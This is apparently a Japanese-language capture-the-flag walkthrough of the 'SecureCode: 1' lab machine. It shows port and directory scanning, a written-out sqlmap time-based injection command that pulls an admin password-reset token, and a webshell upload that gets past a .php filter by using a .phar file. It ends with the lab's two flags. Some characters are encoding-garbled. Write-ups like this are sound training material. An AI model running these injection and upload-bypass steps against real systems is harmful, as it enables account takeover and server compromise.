SecureCode 1

SecureCode: 1

Recon

nmap

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Documents/securecode]
โ””โ”€$ nmap -p- --min-rate 10000 192.168.179.129
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-20 07:19 -0500
Nmap scan report for 192.168.179.129
Host is up (0.00011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:99:FC:D3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Web

Pasted image 20251220212022.png

Directory / File

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Documents/securecode]
โ””โ”€$ feroxbuster -u http://192.168.179.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher ๏ค“                 ver: 2.13.1
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
 ๏Žฏ  Target Url            โ”‚ http://192.168.179.129/
 ๏šฉ  In-Scope Url          โ”‚ 192.168.179.129
 ๏š€  Threads               โ”‚ 50
 ๏“–  Wordlist              โ”‚ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 ๏‘Œ  Status Codes          โ”‚ All Status Codes!
 ๏’ฅ  Timeout (secs)        โ”‚ 7
 ๏ฆก  User-Agent            โ”‚ feroxbuster/2.13.1
 ๏’‰  Config File           โ”‚ /home/kali/.config/feroxbuster/ferox-config.toml
 ๏”Ž  Extract Links         โ”‚ true
 ๏’ฒ  Extensions            โ”‚ [zip]
 ๏  HTTP methods          โ”‚ [GET]
 ๏”ƒ  Recursion Depth       โ”‚ 4
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
 ๏  Press [ENTER] to use the Scan Management Menuโ„ข
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
<SNIP>
200      GET     5780l    35615w  5275298c http://192.168.179.129/source_code.zip

ๅˆ่ฆ‹ใงzipใ‚’ๆŽขใ™้ ญใซใชใ‚Œใชใ‹ใฃใŸใฎใงใ€ๆ™ฎ้€šใซใ“ใฎ่พบใง่ฉฐใพใฃใฆใŸใ€‚

Code

zipใซใฏใ‚ขใƒ—ใƒชใ‚ฑใƒผใ‚ทใƒงใƒณใ‚ณใƒผใƒ‰ใŒๅ…ฅใฃใฆใ„ใ‚‹ใ€‚

Pasted image 20251220225555.png

ๅฝ“่ฉฒๆฉŸ่ƒฝใ‚’sqlmapใงใ‚ดใƒชๆŠผใ™ใ€‚ใƒ†ใƒผใƒ–ใƒซๆง‹้€ ใฏใ‚ฝใƒผใ‚นใ‚ณใƒผใƒ‰ใ‹ใ‚‰ๅˆ†ใ‹ใฃใฆใ„ใ‚‹ใ€‚

Pasted image 20251220225856.png

ใƒ‘ใ‚นใƒฏใƒผใƒ‰ใƒชใ‚ปใƒƒใƒˆใฎ้š›ใ€ใ“ใฎuserใƒ†ใƒผใƒ–ใƒซใซใƒˆใƒผใ‚ฏใƒณใŒๆ›ธใ่พผใพใ‚Œใ‚‹ใ€‚

Pasted image 20251220230016.png

Exploit

ใฎใงใ€userใƒ†ใƒผใƒ–ใƒซใฎadminใซ็™บ่กŒใ•ใ‚Œใฆใ„ใ‚‹ใƒ‘ใ‚นใƒฏใƒผใƒ‰ใƒชใ‚ปใƒƒใƒˆใƒˆใƒผใ‚ฏใƒณใ‚’ๅพ—ใ‚‹ใ“ใจใงใ€ไปปๆ„ใฎใƒ‘ใ‚นใƒฏใƒผใƒ‰ใซๅค‰ๆ›ดใงใใ‚‹ใ€‚

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Documents/securecode]
โ””โ”€$ sqlmap -r viewItem.php --fresh-queries --dbms=MySQL --code=404 --technique=T --time-sec=1 -D hackshop --sql-query='SELECT token FROM user WHERE id=1'
<SNIP>
[08:53:33] [INFO] fetching SQL SELECT statement query output: 'SELECT token FROM user WHERE id=1'
[08:53:33] [INFO] retrieved: 1
[08:53:34] [INFO] retrieved: whwl1vNGVOJca0z
SELECT token FROM user WHERE id=1: 'whwl1vNGVOJca0z'
[08:54:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.179.129'

ใ“ใฎใƒˆใƒผใ‚ฏใƒณใ‚’ใ€doResetPassword.phpใซๆธกใ™ใจใ€ใƒ‘ใ‚นใƒฏใƒผใƒ‰ใƒชใ‚ปใƒƒใƒˆใƒšใƒผใ‚ธใซ่กŒใ‘ใ‚‹ใฎใง

Pasted image 20251220230624.png

ใƒชใ‚ปใƒƒใƒˆใ—ใฆ

Pasted image 20251220230712.png

ใƒญใ‚ฐใ‚คใƒณใ™ใ‚‹ใ€‚

Pasted image 20251220230729.png

Congrats, FLAG1: 0410e2bd77f66dc9a567ab00aa29599cd

ใƒ•ใ‚กใ‚คใƒซใ‚ขใƒƒใƒ—ใƒญใƒผใƒ‰ใŒใ‚ใ‚‹ใŒ.phpใฏ้€šใ‚‰ใชใ„ใฎใงใ€.pharใ‚’ไฝฟใฃใฆwebshellใ‚’่จญ็ฝฎใ™ใ‚‹ใ€‚

Pasted image 20251220231535.png

Pasted image 20251220231549.png

ใ‚ˆใ—ใชใซใ€ๅฏพ่ฑกใƒ•ใ‚กใ‚คใƒซใ‚’่ฆ‹ใคใ‘ใ‚‹ใ€‚

Pasted image 20251220231809.png

legendary

FLAG2: 3599f5effdb3ed07d9a90a4ed19d13ad4

ZIP่ฆ‹ใคใ‘ใ‚‹ใจใ“ใ‚ใŒ่‹ฅๅนฒใ‚จใ‚นใƒ‘ใƒผๅ‘ณใ‚ใ‚‹...๏ผŸใใ‚“ใชใ‚‚ใ‚“ใ‹...